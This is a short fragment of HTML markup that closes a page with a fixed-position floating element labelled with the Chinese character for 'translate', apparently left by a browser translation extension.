fixed; z-index: 99999; left: 0px; top: 0px; transform: translateX(581px) translateY(446px);">译</st-div> </st-div></body></html>